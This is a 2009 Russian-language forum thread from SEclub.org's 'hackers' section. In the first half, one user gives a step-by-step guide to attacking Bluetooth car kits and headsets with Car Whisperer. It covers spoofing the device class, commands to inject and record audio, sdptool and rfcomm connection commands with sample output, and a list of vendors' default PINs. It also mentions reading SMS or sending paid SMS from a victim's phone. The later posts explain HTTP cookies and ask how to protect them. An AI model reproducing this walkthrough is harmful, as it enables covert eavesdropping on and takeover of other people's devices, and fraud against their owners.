Хакеры | SEclub.org
Хакеры
Все новые
А вот как в общем обезопасить куки? А то без них как то мучительно.... Присоединюсь к вопросу.

Ссылка на пост
Всего сообщений: 700
*
SATAS
3 апр 2009 в 03:34
Перед началом операции рекомендуется изменить класс своего устройства, особенно если программа будет использоваться с компьютера: hciconfig адаптер class 0x500204 # 0x500204 - это класс "phone" В противном случае некоторые "умные" девайсы могут заподозрить неладное. Смотрим синтаксис утилиты, который выглядит следующим образом: ./carwhisperer "что внедряем в линию" "что захватываем из линии" "адрес устройства" [канал] Мы взяли внедряемый файл прямо из папки утилиты, а в качестве выходного указали out.raw: ./carwhisperer 0 message.raw /tmp/out.raw 00:15:0E:91:19:73 На выходе получаем файл out.raw. Прослушать его в чистом виде нельзя: необходимо преобразовать в аудио формат, для чего потребуется дополнительная утилита. Подойдут довольно многие аудио конвертеры, например SoX: raw –r 8000 –c 1 –s –w out.raw –t wav –r 44100 –c 2 out.wav
*
SATAS
3 апр 2009 в 03:34
Кроме прослушивания, можно войти в систему, просмотреть телефонную книгу и воспользоваться другими возможностями "свободных рук" с Bluetooth. Принцип такой: сначала осуществляется поиск активных устройств и проверка на предмет сервиса HS (Head Set). Далее исследуется MAC-адрес устройства и производится попытка подключения с использованием стандартного ключа. Если коннект установлен, то с устройством можно делать все, что угодно (в пределах доступного набора AT-команд). На практике это выглядит следующим образом. Сначала осуществляется поиск всех активных гарнитур с помощью команды "sdptool search HS", которая выдает примерно такой ответ:
*
SATAS
3 апр 2009 в 03:34
Inquiring ... Searching for HS on 00:0A:3A:54:71:95 ... Service Name: Headset Service RecHandle: 0x10009 Service Class ID List: "Headset" (0x1108) "Generic Audio" (0x1203) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 7 Language Base Attr List: code_ISO639: 0x656e encoding: 0x6a base_offset: 0x100 Profile Descriptor List: "Headset" (0x1108) Version: 0x0100
*
SATAS
3 апр 2009 в 03:35
Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды "rfcomm connect 2 00:0A:3A:54:71:95 1" и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур: Nokia (00:02:EE...) - pin="5475" Audi UHV (00:0E:9F...) - pin="1234" O"Neill (00:80:37...) - pin="8761" Cellink (00:0A:94...) - pin="1234" Eazix (00:0C:84...) - pin="1234" Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам. При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!
*
SATAS
3 апр 2009 в 03:39
все там www.xakep.ru/post/43524/default.asp там прост еще досс вт устройст и в форум написал чтобы юзеры с тела не были в пролете......вот ссылки на софт SoX: sox.sourceforge.net/ Car Whisperer ссылки нет, FTS4BT Wireless Bluetooth Protocol Analyzerwww.fte.com/
*
AtvintA
3 апр 2009 в 13:42
Не мог бы кто-нибудь из вас дать нормальную и подробную статью о куках с точки зрения хакера? :spasibo: Заранее
*
SATAS
3 апр 2009 в 14:33
cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. Применяется для сохранения данных на стороне пользователя, на практике обычно используется для: аутентификации пользователя; хранения персональных предпочтений и настроек пользователя; отслеживания состояния сессии доступа пользователя; ведения статистики о пользователях.
*
SATAS
3 апр 2009 в 14:34
Назначение Куки используются веб-серверами для различения пользователей и хранения данных о них. К примеру, если вход на сайт осуществляется при помощи куки, то после ввода пользователем своих данных на странице входа куки позволяют серверу запомнить, что пользователь уже идентифицирован и ему разрешён доступ к соответствующим услугам и операциям.[2] Многие сайты также используют куки для сохранения настроек пользователя. Эти настройки могут использоваться для персонализации, которая включает в себя выбор оформления и функциональности. Например, Википедия позволяет
*
SATAS
3 апр 2009 в 14:34
авторизованным пользователям выбрать дизайн сайта. Поисковая система Google позволяет пользователям (в том числе и не зарегистрированным в ней) выбрать количество результатов поиска, отображаемых на одной странице.[3] Куки также используются для отслеживания действий пользователей на сайте. Как правило, это делается с целью сбора статистики, а рекламные компании на основе такой статистики формируют анонимные профили пользователей, для более точного нацеливания рекламы.[
*
SATAS
3 апр 2009 в 14:35
ru.wikipedia.org/wiki/HTTP_cookie более подробнее о куках
*
Maзилa
3 апр 2009 в 17:00
Вопрос: а можно ли сделать так чтобы куки сохранялись в какой нибудь другой папке, чем по умолчанию? И тогда можно будет спокойно сохранятся пароли и никто не сможет их своровать если только не рыться на компе. Я правильно размышляю?
*
}GANDZA{
3 апр 2009 в 17:41
А вот как в общем обезопасить куки? А то без них как то мучительно.... Присоединюсь к вопросу.
Для полноценного использования разделов сайта войдите или зарегистрируйтесь.
Интернет и сети | Компьютеры | Форум | Главная
18+ © Seclub.org 2003-2025